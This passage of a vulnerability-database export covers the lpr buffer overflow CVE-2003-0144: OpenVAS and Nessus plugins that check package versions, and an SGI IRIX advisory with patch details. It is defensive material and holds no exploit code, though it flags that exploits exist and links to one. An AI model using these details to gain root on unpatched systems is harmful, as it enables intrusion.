ver:\"0.72-2.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:11", "references": [], "pluginID": "53358", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-2.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 267-2 (lpr)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53358", "id": "OPENVAS:53358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_267_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 267-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The correction for CVE-2003-0144 for the old stable distribution\n(potato) was a little bit too strict apparently and this update\ncorrects this. For completeness here is the advisory text:\n\nA buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.2.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr\nannounced via advisory DSA 267-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20267-2\";\n\nif(description)\n{\n script_id(53358);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 267-2 (lpr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"0.48-1.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "references": [], "pluginID": "53338", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 267-1 (lpr)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53338", "id": "OPENVAS:53338", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_267_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 267-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.1.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr\nannounced via advisory DSA 267-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20267-1\";\n\nif(description)\n{\n script_id(53338);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 267-1 (lpr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"0.48-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"2000.05.07-4.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:52:01", "references": ["http://www.debian.org/security/2003/dsa-275"], "pluginID": "15112", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "edition": 5, "reporter": "Tenable", "published": "2004-09-29T00:00:00", "title": "Debian DSA-275-1 : lpr-ppd - buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:lpr-ppd"], "id": "DEBIAN_DSA-275.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15112", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-275. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15112);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/20 2:17:10\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_bugtraq_id(7025);\n script_xref(name:\"DSA\", value:\"275\");\n\n script_name(english:\"Debian DSA-275-1 : lpr-ppd - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local user\nto gain root privileges, even if the printer system is set up\nproperly.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-275\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lpr-ppd package immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lpr-ppd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lpr-ppd\", reference:\"0.72-2.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:04:28", "references": ["http://www.debian.org/security/2003/dsa-267"], "pluginID": "15104", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "edition": 5, "reporter": "Tenable", "published": "2004-09-29T00:00:00", "title": "Debian DSA-267-1 : lpr - buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:lpr"], "id": "DEBIAN_DSA-267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15104", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-267. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15104);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/20 2:17:10\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_bugtraq_id(7025);\n script_xref(name:\"DSA\", value:\"267\");\n\n script_name(english:\"Debian DSA-267-1 : lpr - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local user\nto gain root privileges, even if the printer system is set up\nproperly.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-267\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lpr package immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lpr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"lpr\", reference:\"0.48-1.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"lpr\", reference:\"2000.05.07-4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:44", "references": [], "pluginID": "61920", "description": "A buffer overflow was discovered in the lpr printer spooling system that can be exploited by a local user to gain root privileges. This can be done even if the printer is configured properly.", "edition": 5, "reporter": "Tenable", "published": "2012-09-06T00:00:00", "title": "Mandrake Linux Security Advisory : lpr (MDKSA-2003:059)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:lpr"], "id": "MANDRAKE_MDKSA-2003-059.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61920", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:059. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61920);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_xref(name:\"MDKSA\", value:\"2003:059\");\n\n script_name(english:\"Mandrake Linux Security Advisory : lpr (MDKSA-2003:059)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in the lpr printer spooling system\nthat can be exploited by a local user to gain root privileges. This\ncan be done even if the printer is configured properly.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lpr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lpr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"lpr-0.72-3.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n SGI Security Advisory\r\n\r\nTitle : Multiple Vulnerabilities in BSD LPR Subsystem\r\nNumber : 20030406-02-P\r\nDate : April 25, 2003\r\nReference: CERT VU#39001\r\nReference: CERT VU#30308\r\nReference: CERT VU#293305\r\nReference: CVE CAN-2003-0144\r\nReference: SGI Security Advisory 20030406-01-P\r\nReference: SGI BUGS 864917 865485 873984 874729 880124 883255\r\nFixed in : IRIX 6.5.20 or patch 5071\r\n______________________________________________________________________________\r\n\r\n- --------------\r\n- --- Update ---\r\n- --------------\r\n\r\nThis is an update to SGI Security Bulletin 20030406-01-P. The patch\r\nreferenced in that bulletin (patch 5048) did not contain the fixes for SGI\r\nbug number 880124. SGI support has released a new patch (patch 5071) that\r\ndoes contain all the fixes.\r\n\r\n\r\n- -----------------------\r\n- --- Issue Specifics ---\r\n- -----------------------\r\n\r\nIt's been reported that there are several vulnerabilities in the IRIX bsdlpr\r\nprinting subsystem:\r\n\r\n o lpd chkhost() routine is easily spoofed\r\n See: http://www.kb.cert.org/vuls/id/30308\r\n\r\n o lpd should execl() sendmail -t, not sendmail\r\n See: http://www.kb.cert.org/vuls/id/39001\r\n\r\n o Unstable behavior in lpd resulting from the patch4835 fixes\r\n\r\n o lprm buffer overrun\r\n See: http://www.insecure.org/sploits/lprm.overflow.html\r\n http://www.kb.cert.org/vuls/id/293305\r\n\r\nSGI has investigated the issue and recommends the following steps for\r\nneutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be\r\nimplemented on ALL vulnerable SGI systems.\r\n\r\nThese issues have been corrected with patches and in future releases of IRIX.\r\n\r\n\r\n- --------------\r\n- --- Impact ---\r\n- --------------\r\n\r\nThe bsdlpr subsystem is not installed by default on IRIX 6.5 systems. It is\r\nan optional product which can be installed as "print.sw.bsdlpr".\r\n\r\nTo determine the version of IRIX you are running, execute the following\r\ncommand:\r\n\r\n # /bin/uname -R\r\n\r\nThat will return a result similar to the following:\r\n\r\n # 6.5 6.5.19f\r\n\r\nThe first number ("6.5") is the release name, the second ("6.5.16f" in this\r\ncase) is the extended release name. The extended release name is the\r\n"version" we refer to throughout this document.\r\n\r\nTo see if the bsdlpr subsystem is installed, execute the following command:\r\n\r\n $ versions print.sw.bsdlpr\r\n I = Installed, R = Removed\r\n\r\n Name Date Description\r\n I print 01/30/2003 Printing Tools, Release 1.16.5f\r\n I print.sw 01/30/2003 Printing Tools Software 1.16.5f\r\n I print.sw.bsdlpr 01/30/2003 Berkeley 'lpr' Printer Spooler\r\n\r\nIf the output shown is similar to the above, then the subsystem is installed\r\nand the system may be vulnerable.\r\n\r\n\r\n\r\n- ----------------------------\r\n- --- Temporary Workaround ---\r\n- ----------------------------\r\n\r\nThere is no effective workaround available for these problems if the bsdlpr\r\ncapabilities are needed in your printing environment. SGI recommends either\r\nupgrading to IRIX 6.5.20 (when available), or installing the appropriate\r\npatch from the listing below.\r\n\r\n\r\n- ----------------\r\n- --- Solution ---\r\n- ----------------\r\n\r\nSGI has provided a series of patches for these vulnerabilities. Our\r\nrecommendation is to upgrade to IRIX 6.5.20 when available, or install the\r\nappropriate patch.\r\n\r\nSecurity patches are available on both http://support.sgi.com/ and\r\nftp://patches.sgi.com/support/free/security/patches/\r\n\r\n\r\n OS Version Vulnerable? Patch # Other Actions\r\n ---------- ----------- ------- -------------\r\n IRIX 3.x unknown Note 1\r\n IRIX 4.x unknown Note 1\r\n IRIX 5.x unknown Note 1\r\n IRIX 6.0.x unknown Note 1\r\n IRIX 6.1 unknown Note 1\r\n IRIX 6.2 unknown Note 1\r\n IRIX 6.3 unknown Note 1\r\n IRIX 6.4 unknown Note 1\r\n IRIX 6.5 yes Notes 2 & 3\r\n IRIX 6.5.1 yes Notes 2 & 3\r\n IRIX 6.5.2 yes Notes 2 & 3\r\n IRIX 6.5.3 yes Notes 2 & 3\r\n IRIX 6.5.4 yes Notes 2 & 3\r\n IRIX 6.5.5 yes Notes 2 & 3\r\n IRIX 6.5.6 yes Notes 2 & 3\r\n IRIX 6.5.7 yes Notes 2 & 3\r\n IRIX 6.5.8 yes Notes 2 & 3\r\n IRIX 6.5.9 yes Notes 2 & 3\r\n IRIX 6.5.10 yes Notes 2 & 3\r\n IRIX 6.5.11 yes Notes 2 & 3\r\n IRIX 6.5.12 yes Notes 2 & 3\r\n IRIX 6.5.13 yes Notes 2 & 3\r\n IRIX 6.5.14 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.15 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.16 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.17 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.18 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.19 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.20 no\r\n\r\n NOTES\r\n\r\n 1) This version of the IRIX operating has been retired. Upgrade to an\r\n actively supported IRIX operating system. See\r\n http://support.sgi.com/ for more information.\r\n\r\n 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact\r\n your SGI Support Provider or URL: http://support.sgi.com/\r\n\r\n 3) Upgrade to IRIX 6.5.20 (when available)\r\n\r\n 4) Install the patch or upgrade to IRIX 6.5.20 (when available)\r\n Security patches are available on both http://support.sgi.com/ and\r\n ftp://patches.sgi.com/support/free/security/patches/\r\n Note that the patch does include all the fixes that were originally\r\n in patch 4835 and 5048.\r\n\r\n ##### Patch File Checksums ####\r\n\r\nThe actual patch will be a tar file containing the following files:\r\n\r\nFilename: README.patch.5071\r\nAlgorithm #1 (sum -r): 21383 8 README.patch.5071\r\nAlgorithm #2 (sum): 57354 8 README.patch.5071\r\nMD5 checksum: 9B471EF86C10DC32F837B1FDD044529A\r\n\r\nFilename: patchSG0005071\r\nAlgorithm #1 (sum -r): 22998 3 patchSG0005071\r\nAlgorithm #2 (sum): 42262 3 patchSG0005071\r\nMD5 checksum: 63AC61757D175E073D95B27E2D5D2A44\r\n\r\nFilename: patchSG0005071.idb\r\nAlgorithm #1 (sum -r): 12029 3 patchSG0005071.idb\r\nAlgorithm #2 (sum): 52574 3 patchSG0005071.idb\r\nMD5 checksum: 4001E601B65EFE361F5EE694023EFA5A\r\n\r\nFilename: patchSG0005071.print_sw\r\nAlgorithm #1 (sum -r): 29965 266 patchSG0005071.print_sw\r\nAlgorithm #2 (sum): 10328 266 patchSG0005071.print_sw\r\nMD5 checksum: F3740393AEAE2EB9C89CCBA326EC8373\r\n\r\n\r\n- ------------------------\r\n- --- Acknowledgments ----\r\n- ------------------------\r\n\r\nSGI wishes to thank the U.S. Air Force, NASA and the users of the Internet Community at large\r\nfor their assistance in this matter.\r\n\r\n\r\n- -------------\r\n- --- Links ---\r\n- -------------\r\n\r\nSGI Security Advisories can be found at:\r\nhttp://www.sgi.com/support/security/ and\r\nftp://patches.sgi.com/support/free/security/advisories/\r\n\r\nSGI Security Patches can be found at:\r\nhttp://www.sgi.com/support/security/ and\r\nftp://patches.sgi.com/support/free/security/patches/\r\n\r\nSGI patches for IRIX can be found at the following patch servers:\r\nhttp://support.sgi.com/ and ftp://patches.sgi.com/\r\n\r\nSGI freeware updates for IRIX can be found at:\r\nhttp://freeware.sgi.com/\r\n\r\nSGI fixes for SGI open sourced code can be found on:\r\nhttp://oss.sgi.com/projects/\r\n\r\nSGI patches and RPMs for Linux can be found at:\r\nhttp://support.sgi.com/\r\n\r\nSGI patches for Windows NT or 2000 can be found at:\r\nhttp://support.sgi.com/\r\n\r\nIRIX 5.2-6.4 Recommended/Required Patch Sets can be found at:\r\nhttp://support.sgi.com/ and ftp://patches.sgi.com/support/patchset/\r\n\r\nIRIX 6.5 Maintenance Release Streams can be found at:\r\nhttp://support.sgi.com/\r\n\r\nIRIX 6.5 Software Update CDs can be obtained from:\r\nhttp://support.sgi.com/\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com (216.32.174.211). Security advisories and patches are\r\nlocated under the URL ftp://patches.sgi.com/support/free/security/\r\n\r\nFor security and patch management reasons, ftp.sgi.com (mirrors\r\npatches.sgi.com security FTP repository) lags behind and does not do a\r\nreal-time update.\r\n\r\n\r\n- -----------------------------------------\r\n- --- SGI Security Information/Contacts ---\r\n- -----------------------------------------\r\n\r\nIf there are questions about this document, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\n ------oOo------\r\n\r\nSGI provides security information and patches for use by the entire SGI\r\ncommunity. This information is freely available to any person needing the\r\ninformation and is available via anonymous FTP and the Web.\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com (216.32.174.211). Security advisories and patches are\r\nlocated under the URL ftp://patches.sgi.com/support/free/security/\r\n\r\nThe SGI Security Headquarters Web page is accessible at the 